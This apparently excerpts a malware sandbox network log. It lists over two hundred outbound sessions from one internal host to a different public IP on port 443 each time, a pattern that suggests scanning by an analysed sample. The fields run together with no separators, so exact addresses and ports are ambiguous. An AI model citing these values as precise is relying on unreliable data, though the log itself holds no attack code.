                                          21076192.168.2.2336522130.201.14.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21077192.168.2.23366841.137.202.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21078192.168.2.2352694106.33.88.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21079192.168.2.2350796106.12.225.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21080192.168.2.234452483.12.174.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21081192.168.2.2342058151.145.117.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21082192.168.2.2352884161.186.81.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21083192.168.2.2356080131.52.20.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21084192.168.2.2352576179.81.166.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21085192.168.2.233355457.99.255.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21086192.168.2.234273459.47.126.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21087192.168.2.23507028.206.232.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21088192.168.2.2353740206.43.72.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21089192.168.2.235803474.129.134.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21090192.168.2.2358434106.69.164.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21091192.168.2.2352276190.68.159.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21092192.168.2.23576245.64.84.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21093192.168.2.234561850.27.76.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21094192.168.2.235070674.86.175.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21095192.168.2.2338358173.94.124.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21096192.168.2.2333330166.169.117.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21097192.168.2.2353564210.42.233.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21098192.168.2.23373802.76.44.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21099192.168.2.2360326159.169.51.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21100192.168.2.236091435.105.219.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21101192.168.2.2353290113.143.204.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21102192.168.2.233876859.38.86.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21103192.168.2.2345232218.100.120.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21104192.168.2.234449018.84.226.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21105192.168.2.2352754188.218.144.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21106192.168.2.2334272145.227.48.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21107192.168.2.23499222.42.251.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21108192.168.2.234910663.223.142.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21109192.168.2.2344654101.133.39.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21110192.168.2.2343852149.94.60.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21111192.168.2.2347300177.158.94.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21112192.168.2.2338948144.72.66.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21113192.168.2.2338304124.93.39.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21114192.168.2.2334634143.93.94.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21115192.168.2.235704071.101.255.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21116192.168.2.2356908152.188.99.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21117192.168.2.2358200106.74.108.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21118192.168.2.2348234199.74.168.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21119192.168.2.2333590170.219.250.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21120192.168.2.2345256142.84.220.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21121192.168.2.2340128144.8.21.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21122192.168.2.2335116211.153.50.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21123192.168.2.2345698133.115.212.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21124192.168.2.234090490.6.9.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21125192.168.2.234543835.203.57.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21126192.168.2.2356040157.201.126.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21127192.168.2.2344808102.184.196.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21128192.168.2.2360206107.116.113.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21129192.168.2.2350212193.18.207.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21130192.168.2.2347976211.124.129.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21131192.168.2.234892868.63.20.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21132192.168.2.2353678223.141.165.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21133192.168.2.2356188145.3.85.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21134192.168.2.2348194197.193.54.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21135192.168.2.2357412151.144.22.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21136192.168.2.2350138199.246.126.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21137192.168.2.2351018197.151.206.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21138192.168.2.2353074102.122.4.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21139192.168.2.2346676219.104.199.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21140192.168.2.2340460181.182.254.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21141192.168.2.2346246206.2.180.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21142192.168.2.234863449.226.62.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21143192.168.2.2352520102.186.195.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21144192.168.2.2338188209.92.159.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21145192.168.2.2346430222.45.38.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21146192.168.2.2344678101.110.46.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21147192.168.2.2346966179.123.253.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21148192.168.2.234961092.36.98.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21149192.168.2.2337056178.168.118.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21150192.168.2.2341824156.152.42.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21151192.168.2.233407045.105.246.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21152192.168.2.2339344208.144.68.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21153192.168.2.2342910135.71.92.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21154192.168.2.2339410188.247.110.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21155192.168.2.233745287.94.59.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21156192.168.2.2351500223.186.162.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21157192.168.2.233713425.243.98.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21158192.168.2.235060224.48.180.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21159192.168.2.2353666177.130.139.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21160192.168.2.2352828157.117.27.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21161192.168.2.2359902206.194.224.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21162192.168.2.2341104178.142.153.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21163192.168.2.233928462.189.88.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21164192.168.2.2360646216.255.149.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21165192.168.2.235566625.237.40.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21166192.168.2.2356860192.115.170.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21167192.168.2.2359166115.118.9.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21168192.168.2.234348264.194.4.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21169192.168.2.234761862.202.37.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21170192.168.2.235610469.217.169.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21171192.168.2.234861695.61.131.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21172192.168.2.2336578110.19.61.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21173192.168.2.235277259.10.128.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21174192.168.2.2345240146.242.140.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21175192.168.2.2358790137.195.89.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21176192.168.2.2356080148.140.220.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21177192.168.2.235589818.3.125.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21178192.168.2.234545063.50.29.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21179192.168.2.234445097.52.187.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21180192.168.2.2342194165.157.101.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21181192.168.2.235438652.62.137.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21182192.168.2.2348700168.131.162.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21183192.168.2.2348358157.201.24.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21184192.168.2.2356008130.6.103.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21185192.168.2.235394883.125.63.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21186192.168.2.2359720216.192.102.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21187192.168.2.2355712154.140.194.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21188192.168.2.2359154155.222.119.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21189192.168.2.235488298.198.1.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21190192.168.2.2359532167.192.184.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21191192.168.2.235963413.88.75.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21192192.168.2.235098840.127.68.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21193192.168.2.235294038.27.42.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21194192.168.2.2356620141.147.163.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21195192.168.2.23343704.13.218.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21196192.168.2.235649034.81.126.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21197192.168.2.2356416159.236.131.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21198192.168.2.2350860217.218.245.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21199192.168.2.233853046.97.45.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21200192.168.2.2346278189.7.73.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21201192.168.2.2349028221.23.81.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21202192.168.2.235872065.170.251.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21203192.168.2.2337594125.135.64.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21204192.168.2.2338406193.69.14.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21205192.168.2.2338896189.124.125.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21206192.168.2.236029631.20.205.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21207192.168.2.2350094126.14.22.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21208192.168.2.234221624.68.29.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21209192.168.2.2341448184.145.199.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21210192.168.2.235014674.23.18.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21211192.168.2.2348786117.221.239.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21212192.168.2.235686861.231.134.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21213192.168.2.234311674.177.96.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21214192.168.2.234832468.202.133.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21215192.168.2.2352028148.60.32.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21216192.168.2.2347752212.89.103.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21217192.168.2.234420461.145.187.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21218192.168.2.2351874168.76.104.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21219192.168.2.234548237.103.167.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21220192.168.2.234647073.222.50.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21221192.168.2.234573635.133.214.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21222192.168.2.2343754163.173.117.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21223192.168.2.2335540121.168.117.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21224192.168.2.233703018.220.96.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21225192.168.2.2340382187.83.14.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21226192.168.2.23542522.96.55.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21227192.168.2.2349416157.148.100.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21228192.168.2.233688282.169.155.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21229192.168.2.2354690158.128.73.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21230192.168.2.233575071.247.193.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21231192.168.2.234809693.43.57.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21232192.168.2.234882481.9.189.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21233192.168.2.2360376187.141.181.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21234192.168.2.2333802113.34.17.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21235192.168.2.2342268197.121.13.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21236192.168.2.2342422192.181.246.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21237192.168.2.234560058.134.21.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21238192.168.2.236058218.216.206.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21239192.168.2.2352216122.204.214.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21240192.168.2.2339306162.44.70.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21241192.168.2.235675018.90.99.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21242192.168.2.234287854.56.98.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21243192.168.2.233975474.172.118.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21244192.168.2.2335748113.113.134.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21245192.168.2.235881224.112.46.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21246192.168.2.2358568120.213.16.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21247192.168.2.235604270.9.206.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21248192.168.2.2354720142.99.244.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21249192.168.2.2360734165.80.41.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21250192.168.2.2336532146.185.31.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21251192.168.2.2360494131.43.8.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21252192.168.2.234793262.252.190.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21253192.168.2.2341202121.170.115.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21254192.168.2.2352534160.155.101.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21255192.168.2.2351956183.132.211.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21256192.168.2.234618832.132.60.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21257192.168.2.2359904117.183.186.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21258192.168.2.235536899.240.115.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21259192.168.2.2355656128.158.50.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21260192.168.2.2337358157.24.134.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21261192.168.2.234506294.208.84.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21262192.168.2.2348668183.19.134.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21263192.168.2.2348128140.25.54.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21264192.168.2.234446225.99.168.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21265192.168.2.23508082.130.194.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21266192.168.2.2333414125.43.233.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21267192.168.2.234650691.54.98.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21268192.168.2.2360924173.195.199.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21269192.168.2.2360558108.201.69.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21270192.168.2.233701651.182.76.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21271192.168.2.2349458125.116.20.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21272192.168.2.2351368125.219.189.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21273192.168.2.2348936171.190.212.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21274192.168.2.234118465.52.163.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21275192.168.2.2353318209.76.190.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21276192.168.2.234142667.18.96.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21277192.168.2.2333110195.213.183.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21278192.168.2.2358284111.65.214.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21279192.168.2.2353238141.178.113.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21280192.168.2.23458705.241.95.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21281192.168.2.2334390189.112.135.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21282192.168.2.235347043.94.28.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21283192.168.2.2358314136.205.7.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21284192.168.2.2357742220.75.230.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21285192.168.2.233978073.153.159.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21286192.168.2.234346254.20.3.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21287192.168.2.2343354198.99.30.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21288192.168.2.2360210137.28.139.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21289192.168.2.2336908192.131.253.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21290192.168.2.235873886.56.181.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21291192.168.2.2346898107.16.110.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21292192.168.2.2342762157.234.98.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21293192.168.2.234366274.200.51.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21294192.168.2.2349410148.5.135.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21295192.168.2.2336742187.100.51.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21296192.168.2.2354286151.68.158.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21297192.168.2.234045462.44.33.149443
                                          TimestampBytes transferredDirectionData


